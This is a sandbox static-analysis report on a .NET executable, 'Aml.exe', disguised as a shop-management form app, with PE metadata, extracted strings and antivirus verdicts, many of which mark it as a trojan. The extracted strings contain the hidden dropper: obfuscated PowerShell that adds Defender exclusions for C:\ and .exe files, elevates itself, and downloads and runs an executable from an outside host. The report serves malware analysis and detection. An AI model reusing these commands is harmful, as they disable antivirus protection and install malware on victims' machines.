popup
Static | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Static Analysis

PE Compile Time

2076-07-16 16:24:16

PDB Path

C:\Users\Administrator\Desktop\2023CryptsDone\WinFormProject-master\obj\Debug\Aml.pdb

PE Imphash

f34d5f2d4577ed6d9ceec516c1f5a744

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00002000 0x0000263c 0x00002800 5.27462107515
.rsrc 0x00006000 0x00001ab8 0x00001c00 4.33793907173
.reloc 0x00008000 0x0000000c 0x00000200 0.0815394123432

Resources

Name Offset Size Language Sub-language File type
RT_ICON 0x00006598 0x000010a8 LANG_NEUTRAL SUBLANG_NEUTRAL data
RT_ICON 0x00006598 0x000010a8 LANG_NEUTRAL SUBLANG_NEUTRAL data
RT_GROUP_ICON 0x00007650 0x00000022 LANG_NEUTRAL SUBLANG_NEUTRAL data
RT_VERSION 0x00007684 0x00000234 LANG_NEUTRAL SUBLANG_NEUTRAL data
RT_MANIFEST 0x000078c8 0x000001ea LANG_NEUTRAL SUBLANG_NEUTRAL XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

Library mscoree.dll:
0x402000 _CorExeMain
!This program cannot be run in DOS mode.
`.rsrc
@.reloc
v4.0.30319
#Strings
label10
label11
dataGridView1_CellClick_1
Collection`1
printDialog1
printPreviewDialog1
linkLabel1
label1
panel1
toolStripMenuItem1
button1
menuStrip1
dateTimePicker1
printDocument1
showdataGridView1
pictureBox1
checkBox1
groupBox1
textBox1
label12
ToInt32
label2
button2
dateTimePicker2
pictureBox2
label3
button3
pictureBox3
label4
textBox4
label5
button5
label6
button6
label7
button7
get_UTF8
button8
<Module>
mscorlib
Form1_Load
Form2_Load
Form3_Load
checkBox1_CheckedChanged
textBox1_TextChanged
get_Checked
linkLabel1_LinkClicked
set_Handled
set_Selected
showhistorysald
<price>k__BackingField
<Username>k__BackingField
<type>k__BackingField
<menu>k__BackingField
DataGridViewBand
Password
get_price
set_price
set_Image
Invoke
sumsale
IDisposable
FromFile
get_FileName
get_Username
set_Username
DateTime
get_type
set_type
Dispose
Create
DebuggerBrowsableState
STAThreadAttribute
CompilerGeneratedAttribute
DebuggableAttribute
DebuggerBrowsableAttribute
TargetFrameworkAttribute
CompilationRelaxationsAttribute
RuntimeCompatibilityAttribute
get_Value
set_Value
Aml.exe
Encoding
System.Runtime.Versioning
String
disposing
System.Drawing.Printing
System.Drawing
OpenFileDialog
CommonDialog
PrintDialog
PrintPreviewDialog
ShowDialog
GetFolderPath
label1_Click
toolStripMenuItem1_Click
button1_Click
label2_Click
button2_Click
button3_Click
button5_Click
button6_Click
button7_Click
button8_Click
ToolStripMenuItem_Click
ToolStripMenuItem_Click
ToolStripMenuItem_Click
dataGridView1_CellClick
showdatadrink
LinkLabel
set_Cancel
System.Collections.ObjectModel
System.ComponentModel
get_CurrentCell
DataGridViewCell
PowerShell
Control
Program
get_Item
ToolStripMenuItem
ToolStripMenuItem
ToolStripMenuItem
ToolStripMenuItem
System
ShowdataproductAdmin
Application
System.Management.Automation
DataGridViewCellCollection
DataGridViewRowCollection
Button
MenuStrip
showdataSugar
set_PasswordChar
get_KeyChar
SpecialFolder
sender
DateTimePicker
IContainer
set_Filter
dataGridView1_DataError
System.Diagnostics
System.Runtime.CompilerServices
DebuggingModes
EnableVisualStyles
LinkLabelLinkClickedEventArgs
CancelEventArgs
DataGridViewCellEventArgs
DataGridViewDataErrorEventArgs
KeyPressEventArgs
get_Cells
System.Windows.Forms
Password_KeyPress
User_KeyPress
components
get_Rows
Concat
PSObject
SetCompatibleTextRenderingDefault
DialogResult
Environment
PrintDocument
GetByteCount
AddScript
Convert
System.Text
get_Text
set_Text
PriceText
NameText
get_menu
set_menu
DataGridView
get_Now
get_CurrentRow
DataGridViewRow
get_RowIndex
PictureBox
CheckBox
ComboBox
GroupBox
TextBox
category
op_Equality
WrapNonExceptionThrows
.NETFramework,Version=v4.0
FrameworkDisplayName
.NET Framework 4
C:\Users\Administrator\Desktop\2023CryptsDone\WinFormProject-master\obj\Debug\Aml.pdb
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
$psi = New-Object System.Diagnostics.ProcessStartInfo
$psi.FileName = "powershell"
$psi.Arguments = "-ExecutionPolicy Bypass -w 1 -c "".([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionPath ([Char]67+[Char]58+[Char]92);.([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionExtension 'exe'"" "
$psi.Verb = "runas"
$psi.WindowStyle = 1;
$i=$true;
{try {
[System.Diagnostics.Process]::Start($psi)
$i = $false;
} catch {}
While($i)
Start-Sleep -Seconds 10
\a.exe
$a = "
"; Invoke-WebRequest -Uri "http://verifycleansecurity.com/static/Qbffmsv.exe" -OutFile $a; Start-Process $a
Choose Image(*.jpg; *.png; .gif)|.jpg; *.png; *.gif
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
FileDescription
FileVersion
0.0.0.0
InternalName
Aml.exe
LegalCopyright
OriginalFilename
Aml.exe
ProductVersion
0.0.0.0
Assembly Version
0.0.0.0
Antivirus Signature
Bkav W32.AIDetectMalware.CS
Lionic Clean
Elastic Clean
ClamAV Clean
CMC Clean
CAT-QuickHeal Clean
Skyhigh Clean
ALYac Clean
Cylance Clean
Zillya Clean
Sangfor Clean
CrowdStrike win/malicious_confidence_90% (W)
Alibaba Clean
K7GW Clean
K7AntiVirus Clean
huorong Clean
Baidu Clean
VirIT Clean
Paloalto Clean
Symantec ML.Attribute.HighConfidence
tehtris Clean
ESET-NOD32 Clean
APEX Malicious
Avast MalwareX-gen [Trj]
Cynet Clean
Kaspersky UDS:DangerousObject.Multi.Generic
BitDefender Clean
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Clean
Tencent Clean
Sophos Mal/Generic-S
F-Secure Clean
DrWeb Clean
VIPRE Clean
TrendMicro Clean
McAfeeD ti!4BA27A9D19E6
Trapmine Clean
CTX Clean
Emsisoft Clean
Ikarus Win32.Outbreak
FireEye Clean
Jiangmin Clean
Webroot Clean
Varist W32/MSIL_Agent.ISE.gen!Eldorado
Avira Clean
Fortinet Clean
Antiy-AVL Clean
Kingsoft Win32.Troj.Unknown.a
Gridinsoft Clean
Xcitium Clean
Arcabit Clean
SUPERAntiSpyware Clean
Microsoft Trojan:Win32/Wacatac.B!ml
Google Detected
AhnLab-V3 Clean
Acronis Clean
McAfee Artemis!C4E6239CAD71
TACHYON Clean
VBA32 Clean
Malwarebytes Trojan.Crypt.MSIL
Panda Clean
Zoner Clean
TrendMicro-HouseCall Clean
Rising Clean
Yandex Clean
SentinelOne Clean
MaxSecure Trojan.Malware.300983.susgen
GData Clean
AVG MalwareX-gen [Trj]
DeepInstinct MALICIOUS
alibabacloud Clean
No IRMA results available.